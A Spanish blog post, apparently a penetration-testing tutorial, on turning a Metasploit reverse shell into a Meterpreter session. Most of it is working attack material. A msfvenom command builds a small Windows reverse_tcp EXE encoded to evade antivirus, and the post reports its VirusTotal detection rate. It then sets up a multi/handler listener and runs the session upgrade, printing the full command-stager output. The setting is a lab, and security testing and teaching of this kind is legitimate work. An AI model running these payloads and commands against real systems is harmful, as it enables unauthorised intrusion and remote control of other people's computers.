[Metasploit] Convertir una simple SHELL en una sesión de METERPRETER

4/10/2013 05:00:00 p. m. No Comment

















En el artículo de hoy, voy a realizar los pasos necesarios para convertir una simple shell en una sesión de meterpreter. Esto puede resultar muy util, sobretodo si durante el test de pentración te ves obligado a usar una shell simple por ser un archivo de reducidas dimensiones y tener cierta capacidad de evasión de IDS/IPS/AV.



 #ST2Labs                                                                                                                                                                                                         

>> Paso 1:  Generación de una shell de reducidas dimensiones                                                                       

Tal y como ya vimos en su momento en mis otros artículos (I, II y III), se procederá a generar un ejecutable EXE con una shell reversa_tcp, utilizando técnicas de evasión de antivirus y reducción de tamaño.

root@ST2Labs:~# msfvenom -p windows/shell/reverse_tcp -e x86/shikata_ga_nai -i 10 -b '\x00\x0d\x0a\x20' -f exe-small LHOST=192.168.2.105 LPORT=80 > /tmp/tcpviewshell.exe

Se obtiene:
tcpviewshell.exe (~ 5K) | En virustotal se obtiene un 17/45 (37%) de detección, donde algunos de los principales sistemas antivirus no lo detectan, ver informe utilizando el siguiente SHA256: 4684f19fa27ae5d7baf86aabf854ba61d29c444b627eb08305afcedc01a906ca

>> Paso 2:  Configurando Metasploit para gestionar la conexión inversa en el puerto 80                             

Para ello utilizaremos el comando msfconsole, tal como sigue a continuación:

msf > use exploit/multi/handler 
msf  exploit(handler) > set payload windows/shell/reverse_tcp
payload => windows/shell/reverse_tcp
msf  exploit(handler) > set LPORT 80
LPORT => 80
msf  exploit(handler) > set LHOST 192.168.2.105
LHOST => 192.168.2.105
msf  exploit(handler) > set EnableContextEncoding true

msf  exploit(handler) > exploit -j -z
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.2.105:80 
[*] Starting the payload handler...


>> Paso 3:  Ejecutando el archivo tcpviewshell.exe en Windows XP SP3                                                   

Se obtiene el siguiente resultado:


>> Paso 4:  Convirtiendo una shell simple en una sesión de Meterpreter                                                     

Ahora, realizamos el upgrading de la shell win32 a meterpreter session | Lo que realmente se realiza es subir un archivo al equipo remoto utilizando el comando echo.

Para realizar el updating se ejecuta el comando session -u [Id_session_shell]


msf  exploit(handler) > sessions -u 1

 [*] Started reverse handler on 192.168.2.105:80 
[*] Starting the payload handler...
[*] Command Stager progress - 1.66% done (1699/102108 bytes)
[*] Command Stager progress - 3.33% done (3398/102108 bytes)
[*] Command Stager progress - 4.99% done (5097/102108 bytes)
[*] Command Stager progress - 6.66% done (6796/102108 bytes)
[*] Command Stager progress - 8.32% done (8495/102108 bytes)
[*] Command Stager progress - 9.98% done (10194/102108 bytes)
[*] Command Stager progress - 11.65% done (11893/102108 bytes)
[*] Command Stager progress - 13.31% done (13592/102108 bytes)
[*] Command Stager progress - 14.98% done (15291/102108 bytes)
[*] Command Stager progress - 16.64% done (16990/102108 bytes)
[*] Command Stager progress - 18.30% done (18689/102108 bytes)
[*] Command Stager progress - 19.97% done (20388/102108 bytes)
[*] Command Stager progress - 21.63% done (22087/102108 bytes)
[*] Command Stager progress - 23.29% done (23786/102108 bytes)
[*] Command Stager progress - 24.96% done (25485/102108 bytes)
[*] Command Stager progress - 26.62% done (27184/102108 bytes)
[*] Command Stager progress - 28.29% done (28883/102108 bytes)
[*] Command Stager progress - 29.95% done (30582/102108 bytes)
[*] Command Stager progress - 31.61% done (32281/102108 bytes)
[*] Command Stager progress - 33.28% done (33980/102108 bytes)
[*] Command Stager progress - 34.94% done (35679/102108 bytes)
[*] Command Stager progress - 36.61% done (37378/102108 bytes)
[*] Command Stager progress - 38.27% done (39077/102108 bytes)
[*] Command Stager progress - 39.93% done (40776/102108 bytes)
[*] Command Stager progress - 41.60% done (42475/102108 bytes)
[*] Command Stager progress - 43.26% done (44174/102108 bytes)
[*] Command Stager progress - 44.93% done (45873/102108 bytes)
[*] Command Stager progress - 46.59% done (47572/102108 bytes)
[*] Command Stager progress - 48.25% done (49271/102108 bytes)
[*] Command Stager progress - 49.92% done (50970/102108 bytes)
[*] Command Stager progress - 51.58% done (52669/102108 bytes)
[*] Command Stager progress - 53.25% done (54368/102108 bytes)
[*] Command Stager progress - 54.91% done (56067/102108 bytes)
[*] Command Stager progress - 56.57% done (57766/102108 bytes)
[*] Command Stager progress - 58.24% done (59465/102108 bytes)
[*] Command Stager progress - 59.90% done (61164/102108 bytes)
[*] Command Stager progress - 61.57% done (62863/102108 bytes)
[*] Command Stager progress - 63.23% done (64562/102108 bytes)
[*] Command Stager progress - 64.89% done (66261/102108 bytes)
[*] Command Stager progress - 66.56% done (67960/102108 bytes)
[*] Command Stager progress - 68.22% done (69659/102108 bytes)
[*] Command Stager progress - 69.88% done (71358/102108 bytes)
[*] Command Stager progress - 71.55% done (73057/102108 bytes)
[*] Command Stager progress - 73.21% done (74756/102108 bytes)
[*] Command Stager progress - 74.88% done (76455/102108 bytes)
[*] Command Stager progress - 76.54% done (78154/102108 bytes)
[*] Command Stager progress - 78.20% done (79853/102108 bytes)
[*] Command Stager progress - 79.87% done (81552/102108 bytes)
[*] Command Stager progress - 81.53% done (83251/102108 bytes)
[*] Command Stager progress - 83.20% done (84950/102108 bytes)
[*] Command Stager progress - 84.86% done (86649/102108 bytes)
[*] Command Stager progress - 86.52% done (88348/102108 bytes)
[*] Command Stager progress - 88.19% done (90047/102108 bytes)
[*] Command Stager progress - 89.85% done (91746/102108 bytes)
[*] Command Stager progress - 91.52% done (93445/102108 bytes)
[*] Command Stager progress - 93.18% done (95144/102108 bytes)
[*] Command Stager progress - 94.84% done (96843/102108 bytes)
[*] Command Stager progress - 96.51% done (98542/102108 bytes)
[*] Command Stager progress - 98.15% done (100216/102108 bytes)
[*] Command Stager progress - 99.78% done (101888/102108 bytes)
[*] Command Stager progress - 100.00% done (102108/102108 bytes)
[*] Sending stage (752128 bytes) to 192.168.2.137
msf  exploit(handler) > sess[*] Meterpreter session 2 opened (192.168.2.105:80 -> 192.168.2.137:1107) at 2013-03-22 18:03:07 +0100
ions 


Finalmente se obtiene una segunda sesión remota con una interfaz meterpreter, véase la imagen siguiente:

Updating win32 shell to meterpreter.

ST2Labs
#Pentesting Rulez!


Tags
Julian J. Gonzalez

Telecommunication Engineer specialized in Networks and Computer Security. Professor of the Master IT Security at the University of Seville since 2013 (http://trajano.us.es/seguridadtic/). Develop skill #Python #DevSecOps #Golang check my Github.

0 comentarios:

Publicar un comentario

Designed with by Way2themes | Distributed by Blogspot Themes